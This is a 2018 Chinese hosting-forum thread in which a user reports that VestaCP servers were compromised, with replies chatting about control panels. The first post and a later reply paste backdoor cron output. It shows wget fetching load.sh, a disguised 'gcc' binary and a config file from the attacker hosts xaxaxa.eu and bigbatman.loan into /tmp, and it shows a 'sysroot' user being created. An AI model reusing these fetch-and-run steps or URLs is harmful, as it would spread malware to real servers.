设为首页收藏本站

 找回密码
 立即注册
HS2V主机综合交流论坛»论坛 主机综合交流 美国VPS综合讨论 vestacp又被攻陷了
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
返回列表 发新帖
查看: 81|回复: 8

vestacp又被攻陷了

[复制链接]
catding

27

主题

148

回帖

839

积分

高级会员

积分
839
发表于 2018-6-26 10:33:14 | 显示全部楼层 |阅读模式
几台vestacp的机器,又被攻陷了。。
早上起来全是报警邮件

--2018-06-26 09:01:01--  http://xaxaxa.eu/load.sh
Resolving xaxaxa.eu... 198.251.90.113
Connecting to xaxaxa.eu|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 605 [application/x-sh]
Saving to: “/tmp/load.sh”

     0K                                                       100%  159M=0s

2018-06-26 09:01:01 (159 MB/s) - “/tmp/load.sh” saved [605/605]

chmod: invalid mode: `x'
Try `chmod --help' for more information.
pkill: 11555 - Operation not permitted
--2018-06-26 09:01:01--  http://xaxaxa.eu/gcc
Resolving xaxaxa.eu... 198.251.90.113
Connecting to xaxaxa.eu|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1256576 (1.2M) [text/plain]
Saving to: “/tmp/gcc”

     0K .......... .......... .......... .......... ..........  4%  211K 6s
    50K .......... .......... .......... .......... ..........  8% 2.85M 3s
   100K .......... .......... .......... .......... .......... 12%  381M 2s
   150K .......... .......... .......... .......... .......... 16% 6.15M 1s
   200K .......... .......... .......... .......... .......... 20% 3.82M 1s
   250K .......... .......... .......... .......... .......... 24% 1.28M 1s
   300K .......... .......... .......... .......... .......... 28% 2.67M 1s
   350K .......... .......... .......... .......... .......... 32% 2.53M 1s
   400K .......... .......... .......... .......... .......... 36% 1.32M 1s
   450K .......... .......... .......... .......... .......... 40% 51.3M 1s
   500K .......... .......... .......... .......... .......... 44%  255K 1s
   550K .......... .......... .......... .......... .......... 48%  140M 1s
   600K .......... .......... .......... .......... .......... 52%  119M 1s
   650K .......... .......... .......... .......... .......... 57% 2.51M 0s
   700K .......... .......... .......... .......... .......... 61% 7.92M 0s
   750K .......... .......... .......... .......... .......... 65% 43.7M 0s
   800K .......... .......... .......... .......... .......... 69% 2.38M 0s
   850K .......... .......... .......... .......... .......... 73% 86.0M 0s
   900K .......... .......... .......... .......... .......... 77% 1.34M 0s
   950K .......... .......... .......... .......... .......... 81% 74.2M 0s
  1000K .......... .......... .......... .......... .......... 85% 39.0M 0s
  1050K .......... .......... .......... .......... .......... 89% 1.18M 0s
  1100K .......... .......... .......... .......... .......... 93% 95.0M 0s
  1150K .......... .......... .......... .......... .......... 97% 1.29M 0s
  1200K .......... .......... .......                         100% 53.2M=0.8s

2018-06-26 09:01:02 (1.59 MB/s) - “/tmp/gcc” saved [1256576/1256576]

chmod: cannot access `gcc': No such file or directory
--2018-06-26 09:01:02--  http://xaxaxa.eu/config_1.json
Resolving xaxaxa.eu... 198.251.90.113
Connecting to xaxaxa.eu|198.251.90.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 681 [application/json]
Saving to: “/tmp/config_1.json”

     0K                                                       100%  151M=0s

2018-06-26 09:01:02 (151 MB/s) - “/tmp/config_1.json” saved [681/681]

/tmp/load.sh: line 10: /tmp/gcc: Permission denied
[sudo] password for admin: useradd: user 'sysroot' already exists
[sudo] password for admin: [sudo] password for admin: /usr/local/vesta/bin/v-update-sys-vesta-all: line 17: /usr/local/vesta/conf/vesta.conf: Permission denied
/tmp/load.sh: line 17: a-all: command not found
/tmp/load.sh: line 18: syntax error near unexpected token `fi'
/tmp/load.sh: line 18: `fi'
回复

使用道具 举报

百仕创云

20

主题

38

回帖

212

积分

中级会员

积分
212
发表于 2018-6-26 10:38:53 | 显示全部楼层
吓得我赶紧打开3个宝塔压压惊
回复

使用道具 举报

catding

27

主题

148

回帖

839

积分

高级会员

积分
839
 楼主| 发表于 2018-6-26 10:43:28 | 显示全部楼层
主要是想弄个邮箱而已。。。。不跑网站的
回复

使用道具 举报

catding

27

主题

148

回帖

839

积分

高级会员

积分
839
 楼主| 发表于 2018-6-26 10:44:36 | 显示全部楼层
还有个--2018-06-26 10:42:01--  http://bigbatman.loan/load.sh
Resolving bigbatman.loan... 104.18.35.148, 104.18.34.148, 2400:cb00:2048:1::6812:2294, ...
Connecting to bigbatman.loan|104.18.35.148|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 673 [application/x-sh]
Saving to: “/tmp/load.sh”

     0K                                                       100%  168M=0s

2018-06-26 10:42:01 (168 MB/s) - “/tmp/load.sh” saved [673/673]

/bin/sh: /tmp/load.sh: Text file busy

回复

使用道具 举报

左手写爱

37

主题

4212

回帖

1万

积分

论坛元老

积分
13192
发表于 2018-6-26 11:57:44 | 显示全部楼层
楼主用的什么监控??
回复

使用道具 举报

catding

27

主题

148

回帖

839

积分

高级会员

积分
839
 楼主| 发表于 2018-6-26 12:44:04 | 显示全部楼层
没有监控,是后门的cron报警,发到我邮箱了
回复

使用道具 举报

qxwo

263

主题

671

回帖

3859

积分

论坛元老

积分
3859
发表于 2018-6-26 12:47:18 | 显示全部楼层
这么说起来还是lnmp靠谱吗?
回复

使用道具 举报

caibrid

5

主题

51

回帖

269

积分

中级会员

积分
269
发表于 2018-6-26 12:48:02 | 显示全部楼层
用什么面板呢,服务器上能少装东西就少装。
回复

使用道具 举报

catding

27

主题

148

回帖

839

积分

高级会员

积分
839
 楼主| 发表于 2018-6-26 13:26:53 | 显示全部楼层
Vestacp的邮件功能很不错
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-11-18 03:43 , Processed in 0.069064 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表